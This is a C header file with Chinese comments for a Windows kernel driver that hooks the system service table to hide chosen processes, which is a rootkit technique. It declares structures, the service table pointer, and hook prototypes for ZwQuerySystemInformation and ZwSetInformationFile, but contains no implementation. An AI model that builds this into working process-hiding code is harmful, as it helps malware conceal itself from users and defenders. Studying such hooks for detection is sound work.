sys.h

C 语言程序源码

/* ******************************************************************
	文件:PorcessHide.h
	挂钩80x86 CPU,WIN2K或更高版本的系统服务表,这个驱动用来隐藏指定进程
	code by xicao from SEU (02/26/2006)
****************************************************************** */

/*extern "C"表示"用C链接".如果你的文件名是*.c的话这句可以省略*/
#ifdef __cplusplus
extern "C"
{
#endif

#include		<stdarg.h>
#include		<stdio.h>

#define	FILE_DEVICE_WINHOOK    0x00009122

/*定义本机API进程/线程结构*/
struct _SYSTEM_THREADS
{
   LARGE_INTEGER    KernelTime;
   LARGE_INTEGER    UserTime;
   LARGE_INTEGER    CreateTime;
   ULONG            WaitTime;
   PVOID            StartAddress;
   CLIENT_ID        ClientIs;
   KPRIORITY        Priority;
   KPRIORITY        BasePriority;
   ULONG            ContextSwitchCount;
   ULONG            ThreadState;
   KWAIT_REASON     WaitReason;
};

struct _SYSTEM_PROCESSES
{
   ULONG            NextEntryDelta;
   ULONG            ThreadCount;
   ULONG            Reserved[6];
   LARGE_INTEGER    CreateTime;
   LARGE_INTEGER    UserTime;
   LARGE_INTEGER    KernelTime;
   UNICODE_STRING   ProcessName;
   KPRIORITY        BasePriority;
   ULONG            ProcessId;
   ULONG            InheritedFromProcessId;
   ULONG            HandleCount;
   ULONG            Reserved2[2];
   VM_COUNTERS      VmCounters;
   IO_COUNTERS      IoCounters;//Win2000特有的
   struct _SYSTEM_THREADS Threads[1];
};

/*定义系统服务表结构*/
typedef struct _SRVTABLE {
	PVOID				 *ServiceTable;
	ULONG           LowCall;        
	ULONG           HiCall;
	PVOID				 *ArgTable;
} SRVTABLE, *PSRVTABLE;

/*原ZwQuerySystemInformation函数指针*/
NTSTATUS	(*RealZwQuerySystemInformation)(
					IN		ULONG  SystemInformationClass,
					IN		PVOID  SystemInformation,
					IN		ULONG  SystemInformationLength, 
					OUT	PULONG ReturnLength
			);	

/*本机API函数ZwQuerySystemInformation定义*/
NTSYSAPI	NTSTATUS  NTAPI ZwQuerySystemInformation(
					IN  ULONG  SystemInformationClass,
					IN  PVOID  SystemInformation,
					IN  ULONG  SystemInformationLength,
					OUT PULONG ReturnLength
				);
//原函数
NTSTATUS
(*RealZwSetInformationFile)(IN HANDLE FileHandle,
                  OUT PIO_STATUS_BLOCK IoStatusBlock,
                  IN PVOID FileInformation,
                  IN ULONG Length,
                  IN FILE_INFORMATION_CLASS FileInformationClass); 
//自己的函数
NTSTATUS HookZwSetInformationFile(IN HANDLE FileHandle,
                OUT PIO_STATUS_BLOCK IoStatusBlock,
                IN PVOID FileInformation,
                IN ULONG Length,
                IN FILE_INFORMATION_CLASS FileInformationClass); 

/*安装System Call钩子*/
VOID	    HookSystemCall();
VOID		HookAPI();
/*卸载System Call钩子*/
VOID	  UnhookSystemCall();
VOID UnHook();

/*自定义hook处理的ZwQuerySystemInformation函数*/
NTSTATUS  HookZwQuerySystemInformation( 
					IN  ULONG  SystemInformationClass, 
					IN  PVOID  SystemInformation, 
					IN  ULONG  SystemInformationLength, 
					OUT PULONG ReturnLength
		  );

/*驱动入口函数(必须)*/
NTSTATUS  DriverEntry(
					IN	PDRIVER_OBJECT	 DriverObject,
					IN	PUNICODE_STRING RegistryPath
		  );

/*驱动分发函数*/
NTSTATUS  DriverDispatch(
					IN		PDEVICE_OBJECT DeviceObject,
					IN		PIRP				Irp
		  );

/*驱动卸载函数*/
VOID	  DriverUnload(
		         IN PDRIVER_OBJECT	 DriverObject
		  );

/*系统服务表镜像的指针*/
extern PSRVTABLE KeServiceDescriptorTable;

#ifdef __cplusplus
}
#endif